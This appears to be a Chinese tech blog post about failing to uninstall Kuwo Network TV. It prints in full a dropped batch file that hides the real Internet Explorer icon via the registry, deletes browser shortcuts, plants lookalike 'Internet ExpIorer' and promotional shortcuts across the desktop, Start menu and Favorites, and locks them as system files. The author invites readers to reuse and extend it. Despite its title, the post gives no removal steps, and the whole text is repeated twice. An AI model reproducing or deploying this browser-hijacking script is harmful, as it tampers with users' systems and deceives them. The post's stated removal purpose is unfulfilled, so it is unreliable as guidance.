某日,客户要求卸载酷我网络电视
按照一般卸载流程:
1. 在控制面板→添加/删除程序 内没有发现此程序身影
2. 360程序管理中也没有找到其地方
3. 在使用ie修复工具(如超级兔子。。。)修复重启后,故障依然。
 
查看任务管理器后发现其进程: kuwotv.exe
搜索后,发现其路径为:
C:\windows\system32\ kuwotv.exe
使用其他
查看此目录下 还有kaijie.bat的运行文件,此文件源代码如下(大家参考哈,可以自己添加很多东西哦!!!):
 
cls
@echo off
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t "REG_DWORD" /d "1" /f
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t "REG_DWORD" /d "1" /f
Set "TMPINF=C:\TmpInf.inf"
echo [Version] >%TMPINF%
echo Signature="$Windows NT$" >>%TMPINF%
echo [DefaultInstall] >>%TMPINF%
RUNDLL32 SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 %TMPINF%
del %TMPINF%
 
 
 del "%userprofile%\桌面\IEXPLORE.lnk"
del "%userprofile%\桌面\IEXPLOREr.lnk"
del "%userprofile%\桌面\Internet Exporer.lnk"
del "%userprofile%\桌面\Internet Explorer.lnk"
del "%userprofile%\桌面\Internet Exp1orer.lnk"
del "%userprofile%\桌面\Internet Explorer.lnk"
del "%userprofile%\桌面\Internet*.lnk"  /f/q/a
del "%userprofile%\桌面\*Internet*.lnk" /f/q/a
 
 
 
del "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\*.url" /f/q/a
del "%userprofile%\桌面\*.url"     /f/q/a
 
 
copy "Internet ExpIorer.lnk" "%userprofile%\桌面\Internet Expleror.lnk" /y
 
 
copy "Internet ExpIorer.lnk" "%userprofile%\「开始」菜单\网址之家.lnk" /y
copy "淘宝购物.lnk" "%userprofile%\「开始」菜单\淘宝购物.lnk" /y
copy "免费电影.lnk" "%userprofile%\「开始」菜单\免费电影.lnk" /y
copy "FilmTVkk.lnk" "%userprofile%\「开始」菜单\酷我网络电视.lnk" /y
copy "yx.lnk" "%userprofile%\「开始」菜单\小游戏.lnk" /y
 
 
copy "FilmTVkk.lnk" "%userprofile%\「开始」菜单\程序\酷我网络电视.lnk" /y
copy "Internet ExpIorer.lnk" "%userprofile%\「开始」菜单\程序\Internet ExpIorer.lnk" /y
copy "Internet ExpIorer.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet Explorrer 浏览器.lnk" /y
 
 copy "FilmTVkk.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\酷我网络电视.lnk" /y
 copy "yx.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\小游戏.lnk" /y
 
 
 
copy "taobao.lnk" "%userprofile%\Favorites\淘宝购物.lnk" /y
copy "免费电影.lnk" "%userprofile%\Favorites\免费电影.lnk" /y
copy "yx.lnk" "%userprofile%\Favorites\小游戏.lnk" /y
copy "Internet ExpIorer.lnk" "%userprofile%\Favorites\酷站大全.lnk" /y
 
 start kuwotv.exe
  attrib  "%USERPROFILE%\桌面\Internet Expleror.lnk"  +R +S
 
 attrib "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\*.lnk"  +R +S
 
attrib  "%userprofile%\「开始」菜单\网址之家.lnk" +R +S
attrib  "%userprofile%\「开始」菜单\淘宝购物.lnk" +R +S
attrib  "%userprofile%\「开始」菜单\免费电影.lnk" +R +S
attrib  "%userprofile%\「开始」菜单\酷我网络电视.lnk" +R +S
attrib  "%userprofile%\「开始」菜单\小游戏.lnk" +R +S
 
exit
病毒是这样修炼的之如何清除酷我网络电视
 
某日,客户要求卸载酷我网络电视
按照一般卸载流程:
1. 在控制面板→添加/删除程序 内没有发现此程序身影
2. 360程序管理中也没有找到其地方
3. 在使用ie修复工具(如超级兔子。。。)修复重启后,故障依然。
 
查看任务管理器后发现其进程: kuwotv.exe
搜索后,发现其路径为:
C:\windows\system32\ kuwotv.exe
使用其他
查看此目录下 还有kaijie.bat的运行文件,此文件源代码如下(大家参考哈,可以自己添加很多东西哦!!!):
 
cls
@echo off
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t "REG_DWORD" /d "1" /f
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t "REG_DWORD" /d "1" /f
Set "TMPINF=C:\TmpInf.inf"
echo [Version] >%TMPINF%
echo Signature="$Windows NT$" >>%TMPINF%
echo [DefaultInstall] >>%TMPINF%
RUNDLL32 SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 %TMPINF%
del %TMPINF%
 
 
 del "%userprofile%\桌面\IEXPLORE.lnk"
del "%userprofile%\桌面\IEXPLOREr.lnk"
del "%userprofile%\桌面\Internet Exporer.lnk"
del "%userprofile%\桌面\Internet Explorer.lnk"
del "%userprofile%\桌面\Internet Exp1orer.lnk"
del "%userprofile%\桌面\Internet Explorer.lnk"
del "%userprofile%\桌面\Internet*.lnk"  /f/q/a
del "%userprofile%\桌面\*Internet*.lnk" /f/q/a
 
 
 
del "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\*.url" /f/q/a
del "%userprofile%\桌面\*.url"     /f/q/a
 
 
copy "Internet ExpIorer.lnk" "%userprofile%\桌面\Internet Expleror.lnk" /y
 
 
copy "Internet ExpIorer.lnk" "%userprofile%\「开始」菜单\网址之家.lnk" /y
copy "淘宝购物.lnk" "%userprofile%\「开始」菜单\淘宝购物.lnk" /y
copy "免费电影.lnk" "%userprofile%\「开始」菜单\免费电影.lnk" /y
copy "FilmTVkk.lnk" "%userprofile%\「开始」菜单\酷我网络电视.lnk" /y
copy "yx.lnk" "%userprofile%\「开始」菜单\小游戏.lnk" /y
 
 
copy "FilmTVkk.lnk" "%userprofile%\「开始」菜单\程序\酷我网络电视.lnk" /y
copy "Internet ExpIorer.lnk" "%userprofile%\「开始」菜单\程序\Internet ExpIorer.lnk" /y
copy "Internet ExpIorer.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet Explorrer 浏览器.lnk" /y
 
 copy "FilmTVkk.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\酷我网络电视.lnk" /y
 copy "yx.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\小游戏.lnk" /y
 
 
 
copy "taobao.lnk" "%userprofile%\Favorites\淘宝购物.lnk" /y
copy "免费电影.lnk" "%userprofile%\Favorites\免费电影.lnk" /y
copy "yx.lnk" "%userprofile%\Favorites\小游戏.lnk" /y
copy "Internet ExpIorer.lnk" "%userprofile%\Favorites\酷站大全.lnk" /y
 
 start kuwotv.exe
  attrib  "%USERPROFILE%\桌面\Internet Expleror.lnk"  +R +S
 
 attrib "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\*.lnk"  +R +S
 
attrib  "%userprofile%\「开始」菜单\网址之家.lnk" +R +S
attrib  "%userprofile%\「开始」菜单\淘宝购物.lnk" +R +S
attrib  "%userprofile%\「开始」菜单\免费电影.lnk" +R +S
attrib  "%userprofile%\「开始」菜单\酷我网络电视.lnk" +R +S
attrib  "%userprofile%\「开始」菜单\小游戏.lnk" +R +S
 
exit